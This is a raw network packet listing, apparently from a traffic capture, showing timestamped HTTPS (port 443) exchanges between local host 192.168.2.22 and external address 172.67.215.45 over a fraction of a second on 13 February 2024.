Feb 13, 2024 15:08:06.553520918 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.553553104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.553560972 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.553571939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.554112911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.554136992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.554172039 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.554181099 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.554191113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.554461956 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.554488897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.554516077 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.554523945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.554536104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.555284977 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.555305958 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.555339098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.555347919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.555356979 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.556020021 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.556050062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.556077003 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.556082964 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.556102037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.557020903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.557044029 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.557085037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.557091951 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.557101965 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.557214975 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.557241917 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.557265043 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.557271957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.557293892 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.558163881 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.558204889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.558234930 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.558243036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.558268070 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.558716059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.558752060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.558773041 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.558779955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.558803082 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.559434891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.559463978 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.559492111 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.559499025 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.559510946 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.559781075 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.559815884 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.559832096 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.559839010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.559863091 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.560693979 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.560729027 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.560758114 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.560765982 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.560775995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.561491013 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.561522961 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.561547041 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.561554909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.561564922 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.561636925 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.561665058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.561692953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.561701059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.561712027 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.561737061 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.562658072 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.562695980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.562736988 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.562742949 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.562771082 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.563237906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.563260078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.563313007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.563313007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.563319921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564131021 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564161062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564182043 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.564188004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564212084 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.564316988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564343929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564371109 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.564377069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.564388990 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.565182924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.565212011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.565242052 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.565251112 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.565262079 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.565861940 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.565893888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.565920115 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.565927029 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.565947056 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.566287041 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.566312075 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.566342115 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.566349030 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.566366911 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.567014933 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.567040920 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.567086935 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.567086935 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.567094088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.567778111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.567811966 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.567826986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.567837954 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.567868948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.568381071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.568406105 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.568448067 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.568458080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.568466902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.568649054 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.568682909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.568696022 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.568702936 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.568736076 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.569566965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.569597006 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.569627047 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.569633007 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.569643974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.570472002 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.570508957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.570533037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.570538998 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.570566893 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.570619106 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.570647955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.570676088 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.570682049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.570698977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.570734978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.571491003 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.571542978 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.571561098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.571567059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.571599960 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.572357893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.572386980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.572417021 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.572422981 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.572432995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.572463036 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.572937965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.572978973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.572992086 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.572999001 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.573060036 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.573077917 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.573106050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.573132038 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.573138952 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.573158026 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.573215008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.574038982 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.574064016 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.574090004 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.574099064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.574110985 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.574139118 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.574831009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.574858904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.574930906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.574930906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.574940920 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.575036049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.575057983 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.575105906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.575114012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.575140953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.575958967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.575984955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.576025009 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.576031923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.576066017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.576642036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.576664925 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.576729059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.576735973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.576773882 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.577285051 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.577312946 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.577358961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.577364922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.577447891 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.577472925 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.577492952 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.577545881 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.577564955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.577579021 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.578382969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.578408003 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.578464031 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.578471899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.578511953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.579178095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.579199076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.579231977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.579236984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.579247952 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.579291105 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.579372883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.579395056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.579416990 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.579423904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.579435110 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.579509974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.580346107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.580370903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.580409050 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.580415964 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.580430031 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.580979109 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581003904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581033945 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.581042051 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581053019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.581507921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581532001 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581562042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.581569910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581582069 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.581724882 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581746101 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581779003 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.581785917 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.581796885 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.582645893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.582673073 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.582696915 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.582703114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.582724094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.583520889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.583540916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.583573103 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.583579063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.583590984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.583601952 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.583628893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.583646059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.583653927 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.583678007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.584532022 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.584552050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.584594011 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.584602118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.584613085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.585380077 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.585406065 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.585429907 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.585436106 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.585457087 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.585962057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.585983038 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.586018085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.586023092 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.586041927 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.586062908 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.586088896 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.586118937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.586118937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.586127043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.586148024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.586199999 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.587002993 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587023973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587068081 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.587075949 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587089062 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.587863922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587889910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587919950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.587925911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587937117 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.587944984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587965012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.587992907 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.588000059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.588011026 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.588017941 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.588975906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.589001894 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.589034081 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.589051962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.589061975 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.589687109 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.589709044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.589744091 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.589751959 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.589762926 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.590300083 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.590329885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.590363026 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.590368986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.590379000 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.590379953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.590404987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.590428114 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.590434074 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.590457916 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.590508938 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.591408014 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.591430902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.591466904 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.591480970 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.591496944 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.592207909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.592228889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.592263937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.592269897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.592279911 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.592395067 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.592421055 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.592451096 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.592458010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.592473984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.593306065 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.593327045 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.593450069 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.593450069 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.593466043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.593914032 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.593947887 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.593976974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.594005108 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594019890 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.594501019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594521046 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594568968 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.594578028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594610929 CET	49169	443	192.168.2.22	172.67.215.45
